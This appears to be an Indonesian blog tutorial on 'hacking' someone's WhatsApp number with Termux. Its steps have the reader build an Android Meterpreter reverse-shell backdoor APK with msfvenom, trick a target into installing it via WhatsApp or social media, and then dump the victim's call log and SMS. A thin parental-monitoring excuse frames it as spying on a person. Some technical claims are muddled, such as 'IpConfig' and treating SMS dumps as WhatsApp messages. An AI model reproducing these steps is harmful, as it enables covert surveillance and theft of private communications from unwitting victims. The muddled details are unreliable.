Cara Hack No WA Pakai Termux 2022

Cara Hack No WA Pakai Termux
Cara Hack No WA Pakai Termux - Cara hack nomor WhatsApp atau WhatsApp merupakan sebuah langkah untuk mematai aktivitas yang dilakukan oleh seseorang pengguna akun WhatsApp.

Yang mana menghack akun WhatsApp ini bisa dilakukan oleh siapa saja ya, misalnya orang tua untuk mengawasi anak-anak mereka serta tujuan posistif lainnya.

Nah pada artikel kali ini, kami akan membagikan anda cara hack WhatsApp dengan menggunakan aplikasi Termux.

Sekarang ini terdapat beberapa cara yang bisa dilakukan untuk menyadap WhatsApp orang lain, salah satunya yakni dengan menggunakan aplikasi Termux pada Smartphone anda.

Apabila anda sudah penasaran dengan caranya, maka anda bisa simak pembahasan berikut ini untuk menemukan jawabannya.


Pembahasan Cara Hack No WA Pakai Termux

Siapa sih yang tidak kenal dengan aplikasi Termux, terutama dikalangan para hacker pemula maupun profesional sebagai bahan dasar untuk anda melakukan aktivitas hacking.

Selain itu, aplikasi Termux ini juga sudah terbukti sering kali digunakan untuk menyadap dan salah satunya yakni seperti hack nomor atau akun WhatsApp.


Nah agar tidak telalu penasaran, kami sudah menyediakan tutorial yang mudah untuk anda pahami yaa.

Adapun dibawah ini cara hack no WA pakai Termux yang paling ampuh dan bisa anda coba terapkan pada perangkat Android yang anda punya.


Cara Hack No WA Pakai Termux


Cara Hack No WA Pakai Termux

Cara Hack No WA Pakai Termux
Cara Hack No WA Pakai Termux
Langkah-langkah yang bisa anda gunakan untuk menghack akun WhatsApp seseorang menggunakan Termux tidak terlalu sulit untuk anda lakukan. Berikut cara hack no WA pakai Termux:
  • Pertama-tama, pastikan Smartphone Android anda minimal mempunyai Operasi Sistem (OS) Lolipop 5.0 ke atas, 32 atau 64 bit ke atas.
  • Selanjutnya silahkan anda download aplikasi Termux melalui Google Play Store atau bisa langsung melalui link berikut ini (Download Aplikasi Termux )
  • Kemudian lihatlah alamat IP anda sendiri dengan mengetik IpConfig pada aplikasi Termux.
  • Lalu, silahkan anda ketik script "msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk"
  • Nah setelah itu, pada kalimat LHOST silahkan diganti dengan alamat IP anda sendiri yang dilihat pada langkah pertama ya.
  • Langkah berikutnya bukalah menu File > Home > hack.apk untuk melihat file backdoor yang sudah jadi.
  • Apabila sudah, maka sekarang anda tinggal mengirim file bacdoor nya ke target anda. Baik itu melalui WhatsApp maupun Messenger dan sosial media lainnya.
  • Ketika target sudah berhasil menginstall file APK yang anda kirimkan, maka itu tandanya anda sudah bisa menghack akun atau nomor WhatsApp target.

Lalu, bagaimana cara melihat apakah hasil hack WA dengan aplikasi Termux anda berhasil atau tidak? Maka silahkan anda bisa simak langsung ulasan berikut ini.
  • Untuk melihat panggilan si target, anda bisa langsung mengetikkan "dump_callog".
  • Nah sedangkan untuk melihat riwayat pesan akun WhatsApp si target, maka anda tinggal ketik "dump_sms"



Akhir Kata

Demikianlah itu langkah-langkah yang sudah kami bagikan diatas untuk cara hack akun atau nomor WhatsApp dengan menggunakan aplikasi Termux.

Perlu di ingat, anda bisa menggunakan cara yang kami bagikan ini secara bijak dan jangan sampai merugikan pihak tertentu.

Dengan adanya cara diatas, maka sekarang anda sudah mengetahui cara hack WhatsApp seseorang dengan menggunakan Termux.

Jika menurut anda informasi ini penting, silahkan bagikan saja langsung ke akun media sosial yang anda punya.

Itulah seluruh isi bahasan kami pada artikel kali ini mengenai cara hack no WA pakai Termux. Sekian dan semoga bermanfaat guyss.
Dody S. Seseorang yang senang belajar dan sharing segala hal tentang teknologi.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel